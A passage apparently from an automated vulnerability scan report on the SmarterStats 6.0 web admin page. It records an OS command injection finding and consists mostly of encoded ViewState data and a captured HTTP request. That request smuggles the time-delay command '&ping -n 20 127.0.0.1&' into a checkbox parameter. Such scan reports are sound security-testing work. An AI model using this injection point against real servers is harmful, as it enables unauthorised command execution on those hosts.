Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMAVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxBUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDIFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkMwVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ0BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDUFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkNgVIY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQ3BUhjdGwwMCRNUEgkdWNTaXRlU2VvU2VhcmNoRW5naW5lU2V0dGluZ3MkY2hrbGlzdEVuZ2luZXNfU2V0dGluZ0NoZWNrQm94JDgFSGN0bDAwJE1QSCR1Y1NpdGVTZW9TZWFyY2hFbmdpbmVTZXR0aW5ncyRjaGtsaXN0RW5naW5lc19TZXR0aW5nQ2hlY2tCb3gkOQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMgVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxMwVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNgVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxNwVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxOAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQxOQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMAVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMQVJY3RsMDAkTVBIJHVjU2l0ZVNlb1NlYXJjaEVuZ2luZVNldHRpbmdzJGNoa2xpc3RFbmdpbmVzX1NldHRpbmdDaGVja0JveCQyMQUmY3RsMDAkVFBIJEh5cGVyVGFiU3RyaXAxJEh5cGVyVGFiSXRlbTQPMtQLAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAdATG9nRlRQAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAAJTG9nRlRQVGFiC2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0zDzLgCwABAAAA%2f%2f%2f%2f%2fwEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz%2f%2f%2f%2fkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr%2f%2f%2f%2f8%2f%2f%2f%2fBgcAAAAEVGV4dAoB%2bP%2f%2f%2f%2fz%2f%2f%2f8GCQAAAApSZXNvdXJjZUlEBgoAAAANQExvZ0xvY2F0aW9ucwH1%2f%2f%2f%2f%2fP%2f%2f%2fwYMAAAACFNlbGVjdGVkCAEAAfP%2f%2f%2f%2f8%2f%2f%2f%2fBg4AAAAKUGFnZVZpZXdJRAYPAAAAD0xvZ0xvY2F0aW9uc1RhYgtkBRljdGwwMCRNUEgkUGFnZUlkZW50aWZpZXIxDwUgNGZlNTRjNDQyMWIwNGU1YTk3NWFhNjliOWNjY2M4MTBkBSZjdGwwMCRUUEgkSHlwZXJUYWJTdHJpcDEkSHlwZXJUYWJJdGVtMg8y3AsAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BMb2dPcHRpb25zAfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lEBg8AAAANTG9nT3B0aW9uc1RhYgtkO%2bUDWAPhQZDBIN%2fz%2f3gfFlozCpGuJtURlykZelxfX%2f4%3d&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24lstLogLocation_SettingDropDown=FTP

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 00:26:22 GMT
Content-Length: 0


1.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx [ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414 parameter appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload %26ping%20-n%2020%20127.0.0.1%26 was submitted in the ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414 parameter. The application timed out when responding to the request, indicating that the injected command caused a time delay.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30101

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24BPH%24btnSave&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24txtAdminNewUserName_SettingText=weirdo&ctl00%24MPH%24txtAdminNewPassword_SettingText=LL12345&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on%26ping%20-n%2020%20127.0.0.1%26&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__EVENTTARGET=ctl00%24BPH%24btnSave&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUKLTYwMDgwNjA1Nw8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWDAICD2QWAgIBDxYCHgdWaXNpYmxlaGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ8WAh8CaBYCAgEPFgIeBFRleHRlZAIID2QWAgIBD2QWAgIBD2QWAmYPZBYCAgEPZBYCAgQPFgIfAmhkAgkPZBYEAgEPZBYCAgMPFgIfBAUHTWVzc2FnZWQCAw9kFgJmD2QWAgIHD2QWCAICD2QWBgIBD2QWDmYPZBYCAgEPZBYCAgIPDxYCHwQFCGhveXQubmV0ZGQCAg8PFgIeCl9fcmVhZE9ubHlnZBYCAgEPZBYCAgIPDxYCHwQFATFkZAIDD2QWAgIBD2QWBGYPEGQPFgFmFgEQBQlsb2NhbGhvc3QFATFnZGQCAg8PFgIfBAUJbG9jYWxob3N0ZGQCBA9kFgICAQ9kFgJmDxBkEBUDB1N0YXJ0ZWQGUGF1c2VkCERpc2FibGVkFQMFc3RhcnQGcGF1c2VkCGRpc2FibGVkFCsDA2dnZ2RkAgUPZBYEZg8PFgYeCENzc0NsYXNzBQxJbmRlbnQgRml4ZWQfBAUPU21hcnRlckxvZyBQYXRoHgRfIVNCAgJkZAIBDw8WBB8GBQggU2V0dGluZx8HAgJkZAIGDw8WAh8FZ2QWAgIBD2QWBGYPEGQQFVcoKEdNVC0xMjowMCkgSW50ZXJuYXRpb25hbCBEYXRlIExpbmUgV2VzdCAoR01ULTExOjAwKSBNaWR3YXkgSXNsYW5kLCBTYW1vYRIoR01ULTEwOjAwKSBIYXdhaWkSKEdNVC0wOTowMCkgQWxhc2thJChHTVQtMDg6MDApIFRpanVhbmEsIEJhamEgQ2FsaWZvcm5pYSYoR01ULTA4OjAwKSBQYWNpZmljIFRpbWUgKFVTICYgQ2FuYWRhKS0oR01ULTA3OjAwKSBDaGlodWFodWEsIExhIFBheiwgTWF6YXRsYW4gLSBOZXcnKEdNVC0wNzowMCkgTW91bnRhaW4gVGltZSAoVVMgJiBDYW5hZGEpEyhHTVQtMDc6MDApIEFyaXpvbmEtKEdNVC0wNzowMCkgQ2hpaHVhaHVhLCBMYSBQYXosIE1hemF0bGFuIC0gT2xkGChHTVQtMDY6MDApIFNhc2thdGNoZXdhbjUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE9sZCYoR01ULTA2OjAwKSBDZW50cmFsIFRpbWUgKFVTICYgQ2FuYWRhKTUoR01ULTA2OjAwKSBHdWFkYWxhamFyYSwgTWV4aWNvIENpdHksIE1vbnRlcnJleSAtIE5ldxsoR01ULTA2OjAwKSBDZW50cmFsIEFtZXJpY2EmKEdNVC0wNTowMCkgRWFzdGVybiBUaW1lIChVUyAmIENhbmFkYSkaKEdNVC0wNTowMCkgSW5kaWFuYSAoRWFzdCkrKEdNVC0wNTowMCkgQm9nb3RhLCBMaW1hLCBRdWl0bywgUmlvIEJyYW5jbxMoR01ULTA0OjMwKSBDYXJhY2FzEihHTVQtMDQ6MDApIE1hbmF1cyIoR01ULTA0OjAwKSBBdGxhbnRpYyBUaW1lIChDYW5hZGEpEihHTVQtMDQ6MDApIExhIFBhehQoR01ULTA0OjAwKSBTYW50aWFnbxgoR01ULTAzOjMwKSBOZXdmb3VuZGxhbmQkKEdNVC0wMzowMCkgQnVlbm9zIEFpcmVzLCBHZW9yZ2V0b3duFShHTVQtMDM6MDApIEdyZWVubGFuZBQoR01ULTAzOjAwKSBCcmFzaWxpYRYoR01ULTAzOjAwKSBNb250ZXZpZGVvGChHTVQtMDI6MDApIE1pZC1BdGxhbnRpYxIoR01ULTAxOjAwKSBBem9yZXMaKEdNVC0wMTowMCkgQ2FwZSBWZXJkZSBJcy4lKEdNVCkgQ2FzYWJsYW5jYSwgTW9ucm92aWEsIFJleWtqYXZpaz0oR01UKSBHcmVlbndpY2ggTWVhbiBUaW1lIDogRHVibGluLCBFZGluYnVyZ2gsIExpc2JvbiwgTG9uZG9uPShHTVQrMDE6MDApIEJlbGdyYWRlLCBCcmF0aXNsYXZhLCBCdWRhcGVzdCwgTGp1YmxqYW5hLCBQcmFndWUsKEdNVCswMTowMCkgU2FyYWpldm8sIFNrb3BqZSwgV2Fyc2F3LCBaYWdyZWIvKEdNVCswMTowMCkgQnJ1c3NlbHMsIENvcGVuaGFnZW4sIE1hZHJpZCwgUGFyaXM8KEdNVCswMTowMCkgQW1zdGVyZGFtLCBCZXJsaW4sIEJlcm4sIFJvbWUsIFN0b2NraG9sbSwgVmllbm5hHyhHTVQrMDE6MDApIFdlc3QgQ2VudHJhbCBBZnJpY2EnKEdNVCswMjowMCkgQXRoZW5zLCBCdWNoYXJlc3QsIElzdGFuYnVsEihHTVQrMDI6MDApIEJlaXJ1dBEoR01UKzAyOjAwKSBBbW1hbhUoR01UKzAyOjAwKSBKZXJ1c2FsZW0UKEdNVCswMjowMCkgV2luZGhvZWs5KEdNVCswMjowMCkgSGVsc2lua2ksIEt5aXYsIFJpZ2EsIFNvZmlhLCBUYWxsaW5uLCBWaWxuaXVzHChHTVQrMDI6MDApIEhhcmFyZSwgUHJldG9yaWERKEdNVCswMjowMCkgTWluc2sRKEdNVCswMjowMCkgQ2Fpcm8TKEdNVCswMzowMCkgTmFpcm9iaS0oR01UKzAzOjAwKSBNb3Njb3csIFN0LiBQZXRlcnNidXJnLCBWb2xnb2dyYWQaKEdNVCswMzowMCkgS3V3YWl0LCBSaXlhZGgTKEdNVCswMzowMCkgQmFnaGRhZBMoR01UKzAzOjAwKSBUYmlsaXNpEihHTVQrMDM6MzApIFRlaHJhbh0oR01UKzA0OjAwKSBBYnUgRGhhYmksIE11c2NhdCIoR01UKzA0OjAwKSBDYXVjYXN1cyBTdGFuZGFyZCBUaW1lEChHTVQrMDQ6MDApIEJha3UTKEdNVCswNDowMCkgWWVyZXZhbhEoR01UKzA0OjMwKSBLYWJ1bBgoR01UKzA1OjAwKSBFa2F0ZXJpbmJ1cmcoKEdNVCswNTowMCkgSXNsYW1hYmFkLCBLYXJhY2hpLCBUYXNoa2VudB8oR01UKzA1OjMwKSBTcmkgSmF5YXdhcmRlbmVwdX